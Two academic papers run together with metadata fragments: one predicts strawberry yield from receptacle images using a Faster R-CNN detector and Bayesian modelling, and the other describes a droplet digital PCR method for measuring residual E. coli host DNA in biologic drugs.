Growth models and prediction models have been developed for various crops. Most early growth models were developed for food crops, and the development of growth models for horticultural crops has been actively underway since the 2000s. In the Netherlands, growth models such as ORYZA, LINTUL, and SUCROS have been developed for major crops [41]. Reference [10] developed a model to predict the area of the entire leaf using the length of the middle leaf and the width of the left leaf of strawberries.
Zadravec et al. [45] predicted the fruit diameter of apples. In addition to predicting plant growth, predicting the yield has gained attention as it is the most direct outcome of interest for farmers. References [12,13] used a regression method to predict strawberry yield using predictors such as weather data, fungicides and year of cultivation. Reference [29] combined simulations and machine learning algorithms to predict blueberry yield.
Strawberry is a high value-added crop with a worldwide average yield of 23 tons/ha [14]. Therefore, various growth and yield models have been studied. Logistic, Gompertz, and von Bertalanffy models were used to evaluate growth models and strawberry fruit production [11], and environmental and growth data were used to predict strawberry growth [3,37]. Some studies have found that weather conditions are more important determinants of strawberry yield than flowering and harvest periods [12,13]. In Norway, using historical yield data, a strong correlation was found between strawberry yield and fungicide use [12], and the correlation between strawberry yield and temperature varied with the seasons [39]. Reference [25] developed a yield prediction equation using flower number and temperature data. In order to predict strawberry yield, it is necessary to understand the relationships among various parameters. However, most studies have relied on environmental and growth data, and models using strawberry images are lacking [25,37].
As imaging devices such as digital cameras have become cheaper and easier to install with improving technology, they are widely used in agricultural research. Studies using imaging devices are being conducted on various horticultural crops, including many on strawberries. References [23,46] classified the maturation stages of strawberry flowers and fruits using multispectral images taken with a digital camera. Reference [44] acquired specific-wavelength images of strawberries using a smartphone camera and developed a non-destructive, accurate and convenient method for measuring strawberry maturation stages through a multivariate nonlinear model. Another study demonstrated the feasibility of strawberry yield prediction using image-derived variables [1].
In addition, recent studies have utilized artificial intelligence (AI), a technology that artificially implements human learning and perception abilities. Reference [27] developed a model for predicting strawberry yield by using vegetation index, soil characteristics, and plant parameters in an artificial neural network. Reference [30] developed an integrated system for monitoring strawberry hydroponic environment data and determining the harvest time using the IoT-Edge-AI-Cloud concept.
Image techniques have been used to detect targets and collect digital information from various horticultural crops [8,18], but they involve high costs. In this study, a common digital camera and an object detection technique, which are easier to use and more economical than other imaging and AI techniques, were used. Object detection is a technique for detecting object instances of a certain class (e.g., humans, cars, or buildings) in digital images and videos [9]. The technique has been used for detecting leaves, flowers, and fruits in horticulture. For example, in strawberry, an object detection technique that processes images through many layers using an R-CNN (region-based convolutional neural network) was developed to visually display instances of flowers [21]. Reference [20] detected strawberry flowers in an outdoor field using a deep neural network, achieving an accuracy of 86.1%. Another study counted flowers with a region-based convolutional neural network on RGB images acquired by an unmanned aerial vehicle, achieving an accuracy of 84.1% [5].
The strawberry flower is a powerful factor for predicting fruit yield because flowers become fruits [21]. However, detecting flowers has several risks: (1) strawberry flowers have five petals, which can be lost to aging and disease; (2) strawberry flowers are white and can be confused with surrounding white objects; and (3) strawberry flowers can overlap with other flowers, which adds uncertainty to flower detection results. Moreover, the receptacle is a more direct factor than the flower, although it can be more difficult to detect as it is smaller. Strictly speaking, the part that becomes the fruit is the receptacle at the center of the flower, not the flower itself. To the best of our knowledge, however, no study so far has detected the receptacle in a strawberry flower for yield prediction.
To mitigate these risks and to predict fruit yield using a more direct factor, we considered detecting the receptacle in the strawberry flower. Unlike many other plants, strawberries have a yellow receptacle in the center of the flower that becomes the fruit, and the receptacle's yellow color is less easily confused with the surroundings than the white of the strawberry flower. In this study, the number of receptacles was counted by combining AI technology with receptacle images of five strawberry cultivars acquired during two cultivation periods. One challenge is that not all receptacles are visible in two-dimensional images, so the count sometimes underestimates the actual number of receptacles. This uncertainty was estimated by Bayesian modeling, and several yield prediction models were compared. Therefore, the objective of this study was to predict strawberry yield using an R-CNN for receptacle detection and Bayesian modeling for uncertainty estimation. Furthermore, yield prediction models considering several factors are proposed.
Strawberry cultivation and data collection
Five cultivars of strawberry were grown for this experiment: 'Keumsil', 'Maehyang', 'Seolhyang', 'Arihyang', and 'Jukhyang'. 'Seolhyang' (84.5%), 'Keumsil' (4.1%), 'Jukhyang' (2.8%), and 'Maehyang' (2.5%) account for most of the distribution of domestic strawberries, and 'Arihyang' is recognized for its quality as an export cultivar. Strawberry seedlings were transplanted in two rows in a tunnel-type greenhouse at Kyungpook National University (35° N). In the 2019-2020 trial, seedlings of 'Keumsil', 'Maehyang', and 'Seolhyang' were obtained from Kyungnam Agriculture Research Station (Jinju, Korea); 'Arihyang' seedlings were obtained from the National Institute of Horticulture and Herbal Science (Wanju, Korea); and 'Jukhyang' was purchased from Damyang-gun Agricultural Technology Center (Damyang, Korea). The first experiment was conducted from September 10, 2019 to April 2, 2020, in a randomized complete block design with five replications (22 strawberry transplants per replication). 'Keumsil', 'Maehyang', and 'Seolhyang' were cultivated for 205 days after transplanting (DAT); 'Arihyang' for 196 DAT; and 'Jukhyang' for 189 DAT. 'Seolhyang', 'Maehyang', 'Keumsil', and 'Arihyang' differed in transplanting dates by about a week owing to differences in seedling supply timing, and 'Jukhyang' had a different transplanting date because it is a semi-forcing type. Flower images were taken with a Canon EOS 100D DSLR (Tokyo, Japan) once a week starting from October 16, 2019, when flower stalks appeared. Images were taken from the direction and distance at which the flowers were most clearly visible (Fig. 2).
In the 2020-2021 trial, seedlings of 'Keumsil', 'Maehyang', 'Seolhyang', and 'Arihyang' were obtained from the same sources as in the first experiment, and 'Jukhyang' was purchased from a different seedling company in Damyang-gun (Damyang, Korea). The second experiment was conducted from September 14, 2020 to March 29, 2021, also in a randomized complete block design with five replications (20 strawberry transplants per replication). 'Keumsil' was cultivated for 196 DAT; 'Maehyang', 'Seolhyang', and 'Arihyang' for 189 DAT; and 'Jukhyang' for 172 DAT. 'Seolhyang', 'Maehyang', 'Keumsil', and 'Arihyang' had slightly different transplanting days owing to differences in seedling supply timing; 'Jukhyang' was transplanted in early October because it is a semi-forcing type. Flower images were taken three times a week from November 16, 2020 in the same way as in the first experiment. For strawberries grown in the 2019-2020 season, ripe fruit was harvested 2-3 times a week from November 26; for the 2020-2021 season, ripe fruit was harvested every day from December 10. The number and weight of the harvested strawberries were measured for each cultivar.
Receptacle detection
A total of 1626 color images, introduced above, were used for our experiments. The images were split into training and evaluation sets. The training set consists of 974 images collected from December 18, 2020 to February 15, 2021. The evaluation set consists of 652 images collected from November 6, 2019 to March 19, 2020. One of the authors manually labeled the receptacle(s) in each image of the training set with bounding boxes. The training set was used to train and validate the detection network and to model the relation between the number of receptacles and fruits. The evaluation set was used to estimate the probability of fruit production per receptacle, based on the number of receptacles inferred by the trained network. Because all the images are RGB color images, each corresponds to a three-dimensional array with shape (C × H × W), where C is the number of channels (C = 3 for RGB images), and H and W are the height and width of each image, respectively (H = 3456 and W = 5184 in our experiments). An RGB image has pixel values ranging from 0 to 255. All images were resized to 400 × 600, and all pixel values were then normalized to the range 0 to 1 by dividing by 255.
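As a concrete illustration, the resizing and normalization described above can be sketched with Torchvision transforms. The filename below is hypothetical, and the authors' exact preprocessing code is not published.

```python
# A minimal preprocessing sketch: resize RGB images to 400 x 600 (H x W) and
# scale pixel values from [0, 255] to [0, 1], as described in the text.
from PIL import Image
import torchvision.transforms as T

preprocess = T.Compose([
    T.Resize((400, 600)),  # target (height, width)
    T.ToTensor(),          # float tensor in [0, 1], shape (C, H, W)
])

img = Image.open("strawberry_0001.jpg").convert("RGB")  # hypothetical file
x = preprocess(img)  # tensor of shape (3, 400, 600)
```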
State-of-the-art object detection methods can be categorized into two approaches: one-stage and two-stage [40]. One-stage methods, such as YOLO [35], prioritize inference speed over detection accuracy, whereas two-stage methods, such as Faster R-CNN [36], prioritize detection accuracy over inference speed. Because accuracy is generally more important than speed in long-term horticultural applications, Faster R-CNN was used for receptacle detection.
Faster R-CNN extends Fast R-CNN [15] by means of a region proposal network (RPN). An RPN enables efficient and accurate region proposal generation at nearly no additional computational cost by sharing convolutional features with the detection network (the backbone). The RPN module generates object region proposals by sliding a spatial window over the output feature map from the backbone. The backbone and RPN are trained in an end-to-end manner (i.e., not separately). A ResNet50 [16] was used as the backbone of the Faster R-CNN; its detailed structure is described in [16]. To alleviate the data scarcity problem, we used a network pre-trained on the COCO dataset [22], a popular large-scale object detection dataset. The pre-trained network is available in the Torchvision package [26]. The whole network was then fine-tuned for 10 epochs on the training set of strawberry images. The SGD optimizer was used for fine-tuning with a batch size of 2, learning rate of 0.005, momentum of 0.9, and weight decay of 0.0005. The learning rate was decayed by a factor of 0.1 every 3 epochs. PyTorch [32] was used to implement the receptacle detection network.
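The training configuration above translates almost directly into Torchvision code. The sketch below is ours, not the authors' released code: the two-class head (background plus receptacle) and the `train_loader` yielding batches in Torchvision detection format are assumptions.

```python
# A fine-tuning sketch matching the stated setup: COCO-pretrained Faster R-CNN
# with ResNet50 backbone, SGD (lr 0.005, momentum 0.9, weight decay 0.0005),
# batch size 2, 10 epochs, and lr decayed by 0.1 every 3 epochs.
import torch
import torchvision
from torchvision.models.detection.faster_rcnn import FastRCNNPredictor

model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=True)

# Replace the COCO classification head with a 2-class head: background + receptacle.
in_features = model.roi_heads.box_predictor.cls_score.in_features
model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes=2)

optimizer = torch.optim.SGD(model.parameters(), lr=0.005,
                            momentum=0.9, weight_decay=0.0005)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=3, gamma=0.1)

model.train()
for epoch in range(10):
    # train_loader (assumed) yields a list of image tensors and a list of
    # target dicts with "boxes" and "labels", two images per batch.
    for images, targets in train_loader:
        loss_dict = model(images, targets)  # RPN + ROI head losses
        loss = sum(loss_dict.values())
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
    scheduler.step()
```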
Owing to the limited number of bounding-box-labeled strawberry images, the detection accuracy of the network was validated using 10-fold cross-validation. The mean Average Precision (mAP) [7], one of the primary metrics in object detection, was used as the evaluation metric. The mAP is computed by averaging multiple values of average precision (AP). The APs are calculated at different Intersection over Union (IoU) thresholds, where the IoU is the ratio of the overlap to the union area between the ground-truth and predicted bounding boxes for an object. A detection is considered successful if the IoU exceeds a pre-defined threshold. The IoU thresholds range from 0.5 to 0.95 at intervals of 0.05. The mAP ranges from 0 to 1, with higher values indicating higher detection accuracy.
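For readers unfamiliar with the metric, the IoU at the core of the mAP computation reduces to a few lines; this helper is a generic sketch, not taken from the study's code.

```python
# IoU for axis-aligned boxes in (x1, y1, x2, y2) format. A predicted box
# counts as a correct detection when iou() exceeds the chosen threshold
# (thresholds from 0.50 to 0.95 in steps of 0.05 are averaged for mAP).
def iou(box_a, box_b):
    x1 = max(box_a[0], box_b[0])
    y1 = max(box_a[1], box_b[1])
    x2 = min(box_a[2], box_b[2])
    y2 = min(box_a[3], box_b[3])
    inter = max(0.0, x2 - x1) * max(0.0, y2 - y1)
    area_a = (box_a[2] - box_a[0]) * (box_a[3] - box_a[1])
    area_b = (box_b[2] - box_b[0]) * (box_b[3] - box_b[1])
    union = area_a + area_b - inter
    return inter / union if union > 0 else 0.0
```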
Statistical analysis
The goal of statistical analysis was to predict the total number of strawberry fruits at the end of the harvest season. To obtain a strawberry fruit, a plant must have a receptacle, but not all receptacles produce a strawberry fruit. In this regard, it is important to estimate both the number of receptacles and the probability of fruiting per receptacle.
Let n_obs be the total number of receptacles detected by the AI from pictures taken between December 18, 2020 and February 15, 2021 (one picture per plant). Note that not all receptacles were captured by the pictures, so the true total number of receptacles is greater than n_obs. Let N = n_obs + n_mis be the true number of receptacles, where n_mis is the total number of receptacles undetected by the AI. To account for the uncertainty in N, we modeled n_obs by a binomial distribution with parameters N and θ, where θ is the unknown proportion of receptacles (per plant) detected by the AI. Note that θ is estimable when we have an observed sample of N. We randomly selected four plants per cultivar and recorded both n_obs and n_mis by counting the receptacles that a two-dimensional picture did and did not capture for each plant. These data, combined with a uniform (noninformative) prior on θ, were used to model the posterior distribution of θ (a beta distribution with shape parameters α = 48 and β = 22), and we obtained the posterior predictive distribution of N per plant.
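The posterior predictive step can be sketched by simple Monte Carlo. The negative-binomial form for the missed count below follows from assuming a flat prior on N (our modelling shortcut, not a detail stated by the authors), and the value of n_obs is illustrative.

```python
# Monte Carlo sketch of the posterior predictive distribution of the true
# receptacle count N. theta ~ Beta(48, 22) is the posterior detection rate
# from the text; under a flat prior on N, the missed count n_mis given theta
# is negative binomial with n_obs + 1 required successes and probability theta.
import numpy as np
from scipy import stats

rng = np.random.default_rng(0)
n_obs = 12            # receptacles detected by the AI (example value)
n_draws = 100_000

theta = stats.beta(48, 22).rvs(n_draws, random_state=rng)
n_mis = stats.nbinom(n_obs + 1, theta).rvs(random_state=rng)
N = n_obs + n_mis     # posterior predictive draws of the true count

print(N.mean(), np.percentile(N, [2.5, 97.5]))
```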
We let Y be the total number of fruits per plant and π be the probability of fruiting per receptacle. Given N, we used a quasibinomial distribution (to account for over-dispersion in the count data) and obtained the posterior distribution of π for each cultivar. Farmers' primary interest is to foresee total productivity at the end of the harvest season, which depends on the total number of plants in a farm. In this study, we focused on predicting the number of fruits per plant using the information available early in the harvest season. We used the first four weeks of data (from December 18, 2020 to January 15, 2021) to model the number of fruits per plant.
For concise presentation, we define the following notation. We let μ be the expected number of fruits per plant as of March 26; frt and rec be the rates of change in the average number of fruits and of receptacles per plant, respectively, observed from December 18 to January 15; and prob be the probability of fruiting per receptacle on the logistic scale. We then compared four multiple regression models: (M1) μ explained by the cultivar only; (M2) μ explained by the cultivar and frt; (M3) μ explained by the cultivar, rec and prob; and (M4) μ explained by the cultivar, rec, prob, and rec × prob (i.e., the interaction between rec and prob).
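A minimal sketch of fitting these four models, assuming a dataframe `df` with columns `mu`, `cultivar`, `frt`, `rec`, and `prob` (column names are ours, and the data are not constructed here); the evaluation criteria are described in the next paragraph.

```python
# Fit the four candidate models (M1-M4) with statsmodels formulas and report
# AIC and adjusted R-squared; the LOOCV MSE used in the paper is omitted here.
import statsmodels.formula.api as smf

formulas = {
    "M1": "mu ~ C(cultivar)",
    "M2": "mu ~ C(cultivar) + frt",
    "M3": "mu ~ C(cultivar) + rec + prob",
    "M4": "mu ~ C(cultivar) + rec + prob + rec:prob",
}

for name, formula in formulas.items():
    fit = smf.ols(formula, data=df).fit()  # df is an assumed dataframe
    print(name, round(fit.aic, 1), round(fit.rsquared_adj, 3))
```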
The four models (M1 to M4) were evaluated by the Akaike Information Criterion (AIC) and the adjusted R², and their predictive performances were evaluated by the mean square error (MSE) estimated from leave-one-out cross-validation (LOOCV).

Results

Fig. 3 illustrates two common cases of receptacle detection. Ground-truth and predicted bounding boxes are shown in green and red, respectively. The receptacle detection is not always perfect: there was a case where a bee on a receptacle was detected as a receptacle, and there were cases where the model predicted other objects (e.g., a leaf) as a receptacle. The left panel of Fig. 3 shows the case where the network correctly detected the receptacle(s) in an image. Most results correspond to this case, which means the network was well trained to detect receptacles. In contrast, the right panel of Fig. 3 shows the case where the network correctly detected not only the labeled but also unlabeled receptacles. In the training set, 156 out of 974 training images correspond to this case. Therefore, the somewhat low detection accuracy of mAP 0.6587 is likely due mainly to human mislabeling, and the actual detection accuracy of the network would be higher than the mAP of 0.6587 suggests. The estimated correlation between the AI count and the human count was 0.856 (p < 0.0001). When individual images were analyzed, the AI captured 0.19 more receptacles than humans, on average. Over the two seasons, five strawberry cultivars were studied: 'Arihyang', 'Jukhyang', 'Keumsil', 'Maehyang', and 'Seolhyang'. In the 2019-2020 season, the number of receptacles per plant of 'Arihyang' was significantly higher than those of the other cultivars (p = 0.0002), while fruits per plant tended to be fewer (p = 0.0603) (Fig. 4a-c). These trends resulted in the lowest fruits per receptacle (p = 0.0036). 'Jukhyang', 'Keumsil', 'Maehyang', and 'Seolhyang' showed similar averages for receptacles per plant, fruits per plant, and fruits per receptacle.
In the 2020-2021 season, the average numbers of receptacles per plant of 'Arihyang' and 'Jukhyang' were significantly higher than those of the other cultivars (p < 0.0001), while fruits per receptacle were significantly lower (p = 0.0003). As in 2019-2020, the results showed that a low ratio of fruits per receptacle is a characteristic of 'Arihyang'. The receptacles per plant, fruits per plant, and fruits per receptacle of 'Keumsil', 'Maehyang', and 'Seolhyang' were similar to those in 2019-2020 (Fig. 4d-f).
The AI tended to underestimate the number of receptacles because not all receptacles can be captured in two-dimensional images. Using the Bayesian analysis described in the statistical analysis section, we accounted for the uncertainty associated with the number of missed receptacles, and Fig. 5 presents the estimated probability of fruit production per receptacle for each cultivar. The results clearly show that 'Arihyang' and 'Jukhyang' produce more receptacles but are not efficient (i.e., they have low probabilities of fruiting per receptacle). On the other hand, 'Keumsil' produces fewer receptacles but is very efficient in terms of the probability of fruit production.
Four regression models with the following sets of predictors were compared. Model 1 (M1) considered the cultivar only as a predictor; M2 used the cultivar and the fruit yield during the first month of harvest; M3 used the cultivar, the estimated number of receptacles (rec), and the estimated probability of fruiting per receptacle with logistic transformation (prob); and M4 added the multiplicative term rec × prob to the model. The respective adjusted R² values were 0.235, 0.398, 0.504, and 0.528, and the respective mean square errors estimated by LOOCV were 42.6, 34.1, 28.1, and 27.0. Among the four models compared, M4 was the best, indicating that the effect of having more receptacles depends on the probability of fruiting, which is a sensible result. In addition, the statistical results indicate that the number of receptacles and the probability of fruiting are more helpful for yield prediction than knowing the first-month yield (Table 1).
Discussion
The characteristics of the five tested cultivars were investigated during the 2019-2020 and 2020-2021 seasons [3,17]. In those two studies, 'Arihyang' displayed the greatest average fresh weight per fruit among the five cultivars. This may be due to a lower ratio of fruits per receptacle than the other cultivars, except 'Jukhyang', which was transplanted later than the others. Reference [19] reported that the supply of carbon-based compounds available to fruit may be limited by competition from too many sinks during early fruit development. Since flowers or fruitlets can be sinks, the fruit of 'Arihyang', which had more flowers that did not become fruit than the other cultivars, may have been larger than the fruit of the other cultivars. Therefore, identifying the characteristics of each cultivar may provide information for predicting strawberry fruit yield by cultivar.
Many researchers have reported that object detection can work much faster than humans. Among the object detection techniques, Ref. [42] showed that the test-time speed of Faster R-CNN, the object detection algorithm we used, was 0.2 s, compared with 49 s for R-CNN and 2.3 s for Fast R-CNN. Moreover, in our experiments, the detection model successfully detected some receptacles that should have been detected but were missed by humans, suggesting that AI can detect even objects that humans miss. Object detection technologies are advancing rapidly, and detection accuracy will continue to improve. Moreover, with the dramatic increase in the capability, sophistication, and miniaturization of imaging sensors, a great deal of digital information will be collected in horticulture [8,18,38]. However, many studies have been conducted over short periods, and there are few examples of long-term applications of these technologies in agriculture, even though most crops take several months to grow and harvest. For instance, Refs. [5,21] developed strawberry flower detection systems for fruit yield prediction using an unmanned aerial vehicle (UAV), a digital or RGB camera, and object detection techniques, but the image data were collected once or every two weeks over four months. Furthermore, the characteristics of various cultivars were not considered, and actual fruit yield was not continuously monitored for predicting total fruit yield. In contrast, this study collected flower images and actual fruit yields for five cultivars over two years.
A limitation of this study is that the receptacle, like the flower, is liable to be obscured, and the object detection technique missed some receptacles because only two-dimensional photos were available for model training. We addressed this caveat with Bayesian modeling and quantified the uncertainty; more training data could reduce the uncertainty in the posterior analysis. Future studies can address the caveat with a bigger training dataset and by training on multiple photos per plant (from multiple angles) to improve the object detection algorithm. If collecting many more labeled photos is difficult, especially for training, semi-supervised and self-supervised learning could be breakthroughs against the data scarcity problem [6]. Although the data scarcity problem was alleviated by using a detection model pre-trained on the large-scale COCO dataset, a domain mismatch problem remains. Because the COCO dataset does not contain strawberry images, it is difficult to say that our object detector, pre-trained on COCO and then fine-tuned with a small number of strawberry images, is fully optimized for receptacle detection. To this end, methods based on semi-supervised [24] and/or self-supervised [31] learning can be considered in the future, which is beyond the scope of this paper. Focusing on detailed, accurate information about the receptacle is scientifically plausible because the receptacle is the only part that becomes the fruit, and the health and maturity level of the flower can be identified and filtered by the color or shape of the receptacle. In addition to the numbers of fruits and receptacles observed during the first four weeks of the harvest season, growth variables (e.g., the number of leaves, leaf length and width, and crown size), environmental variables (e.g., day length and light quality), and detailed factors associated with receptacle quality (e.g., receptacle color and shape) may improve yield prediction in future studies.
Many researchers have designed models and applied them to actual production processes [2,4,5,28,33,34,43]. For example, when the growth of a horticultural crop is monitored, it may be judged against the designed models, enabling optimal management decisions to optimize the growth process. Recent studies [3,17] showed that fruit yield depends on cultivar, and the present study further provides statistical evidence that the number of receptacles and the probability of producing fruit per receptacle are cultivar characteristics as well. We used an object detection technique, and we anticipate that advanced object detection techniques (e.g., accurate counting of receptacles using photos from multiple angles) can improve the predictive modeling with less manual effort. As we continue this line of research, we expect more benefits from Bayesian modeling by incorporating more prior information.
Conclusion
A combination of an AI technique and statistical strategies was used to predict strawberry yield from images while accounting for uncertainty. The detector achieved a mAP of 0.6587, and the proposed models achieved higher R² and lower MSE and AIC. The results indicate that collaboration between AI engineers and statisticians can make a great contribution to predicting strawberry yield. However, we recognize that complementary work on data collection is needed to improve prediction accuracy, such as photos with clearly visible flowers, more photos to improve the efficiency of the AI, and the application of automatic photography technology. Moreover, future studies with additional growth and environmental variables, as well as receptacle color and shape, may overcome the weaknesses of our data.
Data availability statement
Data included in article/supplementary material/referenced in article.
Additional information
No additional information is available for this paper.
"year": 2023,
"sha1": "9606405630590777f0bfa04b6c38f6ca5e5aee1f",
"oa_license": "CCBY",
"oa_url": "https://doi.org/10.1016/j.heliyon.2023.e14546",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "df87167e3839d038367e61986113618d70b25d44",
"s2fieldsofstudy": [
"Agricultural And Food Sciences"
],
"extfieldsofstudy": []
} |
A Direct Droplet Digital PCR Method for E. coli Host Residual DNA Quantification
Injectable drugs manufactured in E. coli must be tested for host residual DNA (hrDNA) impurity to ensure drug purity and safety. Because only low levels of hrDNA are allowed as an impurity, highly sensitive methods are needed. Droplet digital PCR (ddPCR) is a new method in which the reaction is partitioned into about 20,000 nanoliter-sized droplets, each acting as an individual PCR reaction. After completion of end-point PCR, droplets are analyzed for fluorescence and categorized as positive or negative, and the DNA is quantified using Poisson statistics. Here we describe the development of a direct E. coli hrDNA ddPCR method in which the drug is added directly to the ddPCR reaction. We show that the ddPCR method has acceptable precision and high accuracy, works with different biologic drugs, and, compared with qPCR, shows higher tolerance of drug matrices. The method does not require DNA extraction or standard curves for quantification of hrDNA in unknown samples.
Introduction
Many recombinant therapeutic proteins are produced in E. coli, e.g., insulin, human growth hormones, insulin-like growth factors, interferons, and interleukins [1]. E. coli is preferred as a host because of its well-characterized genome, the simplicity of its cell culture, rapid growth rates, high levels of expression, and low cost [2] [3] [4]. However, biopharmaceuticals manufactured in host cells contain host residual protein and DNA (hrDNA) as impurities, which must be removed and quantified in the purified drug before it can be used in patients.
The WHO guidelines recommend hrDNA levels of <10 ng per daily dose [5] [6]. Typically, the biopharmaceutical industry uses qPCR, which is a sensitive and accurate method for quantification of hrDNA [7] [8]. Since qPCR requires generation of a standard curve for each experiment and often DNA extraction, both of which can be time consuming, we evaluated direct droplet digital PCR (ddPCR) as an alternative method [9]. In the ddPCR method, the PCR reaction is partitioned into about 20,000 individual nanoliter-sized droplets using microfluidics. After the PCR is run to endpoint, the droplet fluorescence is read and analyzed, the droplets are categorized as positive or negative, and the DNA amount is quantified based on Poisson statistics. After an initial standard curve is generated, future experiments can be run without the need for a DNA standard curve.
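The Poisson step reduces to a one-line estimate of mean copies per droplet from the negative-droplet fraction. In the sketch below, the droplet volume of ~0.85 nL is a commonly cited figure for this type of platform and is our assumption, not a value stated in the text.

```python
# Poisson quantification for ddPCR: with equal-volume droplets, the mean
# number of target copies per droplet is lambda = -ln(fraction negative),
# which converts to a concentration via the droplet volume.
import math

def ddpcr_copies_per_ul(n_positive, n_total, droplet_volume_nl=0.85):
    p_negative = (n_total - n_positive) / n_total
    lam = -math.log(p_negative)              # mean copies per droplet
    return lam / droplet_volume_nl * 1000.0  # copies per microliter

# Example: 500 positive droplets out of 18,000 read
print(ddpcr_copies_per_ul(500, 18_000))      # ~33 copies/uL
```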
The probe, also designed in-house, was FAM-ccgtcacaccatgggagtgggt-TAMRA.
A 10× Assay Mix of the primers and probe was prepared containing 10 µM of each primer and 2.5 µM probe. The mix was stored at -20°C. Prior to each test, a qPCR reaction mix was prepared with TaqMan Universal Master Mix II with UNG and the 10× Assay Mix so that each 20 µL of mix per PCR reaction contained 15 µL of TaqMan Universal Master Mix II, 3.0 µL of 10× Assay Mix, and 2.0 µL of water. Each PCR reaction contained 20 µL of mix and 10 µL of sample, giving a total volume of 30 µL per well in a 96-well optical reaction plate. Generally, 5.0 µL of drug or water and 5.0 µL of standard DNA or water constituted the 10 µL of sample. The drug and the DNA standard were prepared so that the desired amount was present in the 5.0 µL added. PCR cycling conditions were: 2 min at 50°C, then 10 min at 95°C, followed by 40 cycles each consisting of 15 s at 95°C and 1 min at 60°C. The PCR plates were covered with optical adhesive sheets and placed for amplification in a 7500 Fast Real-Time PCR System (Applied Biosystems) using the AccuSEQ Real-Time PCR Detection Software v2.1.
ddPCR Method
We developed the ddPCR method for E. coli hrDNA based on the qPCR method; the same 10× Assay Mix mentioned above was used with Supermix RDQ. Prior to each test, a ddPCR reaction mix was prepared so that each 25 µL of mix per PCR reaction contained 12.5 µL of Supermix RDQ, 2.5 µL of 10× Assay Mix, and 10 µL of sample in the wells of a 96-well PCR plate. The drug and standard DNA were added such that the desired amounts were present in the 20 µL picked up by the Bio-Rad Automated Droplet Generator (ADG) to make droplets. The plate was sealed with Pierceable Foil Heat Seal using a Bio-Rad PX1 PCR Plate Sealer for 5 seconds. The plate was briefly spun and put in the ADG for droplet generation according to the manufacturer's protocol. The ADG made droplets by mixing with oil and delivered them into identical wells of a fresh PCR plate. The new PCR plate with the droplets was carefully removed from the ADG, sealed, and put in a thermocycler for PCR. The PCR cycling conditions were: one cycle of 10 min at 95°C, followed by 40 cycles consisting of 30 s at 94°C with a 2°C/s ramp rate and 1 min at 60°C with a 2°C/s ramp rate; then one cycle of 10 min at 98°C and a hold at 4°C indefinitely. After PCR, the plate was transferred to the Bio-Rad QX200 Droplet Reader and the fluorescence of individual droplets was read following the manufacturer's protocol. The ddPCR data were analyzed with QuantaSoft ver. 1.7.4.0917 software, with the threshold manually set at 1000 after inspecting the 1D scatter of the droplets.
Results and Discussion
The above-mentioned drugs were directly added to the PCR wells for qPCR or ddPCR. The ddPCR results for RP-IG and RP-IR are shown in Figure 1. The positive and negative droplets were well separated, with low fluorescence in the negative droplets and no discernable effect of the drug on the ddPCR. The ddPCR data analysis software has an auto-select function for the threshold, either for individual wells or for combined wells. However, because of issues with the auto settings [10] [11], we decided to set the threshold manually at 1000, which we used for all experiments reported here. We tested the linear range of the ddPCR method by serially diluting the E. coli DNA standard from 1e5 fg to 1.0 fg and performing ddPCR in triplicate over several days. The results exhibit a linear range from 1.0 fg to 1e5 fg of DNA per PCR reaction (Figure 2), and the LOQ was set at 10 fg based on a precision of 17.6% RSD. The linearity was maintained with drug added to the DNA standards (Figure 2), with varying precision at the 10 fg level, e.g., RSD < 30% for RP-IG, IFN-α and IGF; 33.9% for RP-IR; and 53.7% for IFN-γ. The spike recovery, as a measure of the accuracy of the method for the different drugs in the linear range, was about 100%, as seen in Figure 2. The ddPCR-determined copies of DNA can be converted to weight as shown in Figure 2. Since the size of the E. coli genome is approximately 4.7 Mbp, or about 5.18 fg, the data showed that about 7 copies of the 16S rRNA gene target were present in the E. coli genome. A literature search showed that 1 to 15 copies of the 16S rRNA gene are present in different bacterial genomes, with an average of seven copies found in E. coli [12] [13]. To assess the sample matrix effect, an RP-IR process-intermediate sample and purified drug substance were serially diluted 2-fold, and 5.00 to 0.31 µg were tested in qPCR and ddPCR (Table 1). The results showed that qPCR worked only when the samples were diluted to 0.63 µg or lower, but ddPCR worked at all levels starting from 5.0 µg. An advantage of ddPCR over qPCR is the relative lack of matrix effect of crude, process-intermediate and purified drug on the ddPCR method, allowing larger amounts of drug to be tested (Table 1). However, the hrDNA values determined from the samples by either qPCR or ddPCR were reasonably close to each other (Table 2).
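As a quick sanity check on the genome-mass figure cited above, the mass of one genome copy can be computed from the genome size, assuming the standard average molecular weight of ~650 g/mol per base pair of double-stranded DNA (an assumption of ours, not a value given in the text):

```python
# Mass of one E. coli genome copy from its size in base pairs.
AVOGADRO = 6.022e23   # molecules per mole
genome_bp = 4.7e6     # approximate E. coli genome size (bp)
mass_fg = genome_bp * 650 / AVOGADRO * 1e15
print(mass_fg)        # ~5.1 fg, close to the 5.18 fg cited in the text
```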
We successfully developed a ddPCR method for E. coli hrDNA that needs neither DNA extraction nor a standard curve. The method is accurate, precise, and sensitive; tolerant of different sample matrices, allowing higher drug amounts to be tested; and applicable to a wide variety of drug substances produced in E. coli. The method is currently being used for routine testing of samples in our lab.
Precision and DNA quantity were determined from at least three replicate PCR wells and expressed as %RSD. Accuracy was determined by measuring the DNA spike recovery, expressed as %Recovery and calculated as:

%Recovery = ((DNA quantity in spiked sample) − (DNA quantity in unspiked sample)) × 100 / spike amount
Figure 1. Droplet fluorescence of E. coli ddPCR. The amount of serially diluted E. coli DNA standard alone (Std) and spiked into drugs in ddPCR is shown on the x-axis. Two purified drugs, RP-IG and RP-IR at 5.0 µg each, were used. The fluorescence amplitude (of Ch 1, set for FAM) of each droplet after PCR in this 1D concentration plot, analyzed with Bio-Rad QuantaSoft, is shown on the y-axis. The vertical dashed yellow lines separate the individual wells (noted in some cases at the top) of the ddPCR plate. The horizontal red line is the threshold separating positive (blue dots) and negative (black dots) droplets; it was set manually at 1000.

Figure 2. The ddPCR results are shown on the y-axis as copies of DNA detected. Based on the DNA standards only, the solid line shows the linear trend line for the mean. The dotted lines show the 95% confidence interval for the individual measurements, calculated as 2.0 RMSE of a log/log fit with slope = 1. The conversion factor from DNA copies to weight in fg was calculated from the inverse of the slope of the standard curve: 1/1.28 ≈ 0.8.
Table 1. Sample matrix effect on qPCR and ddPCR.
Table 2. Quantification of E. coli hrDNA.
"year": 2018,
"sha1": "22b980f9125b74143d2e2b9c8a573481644e43cc",
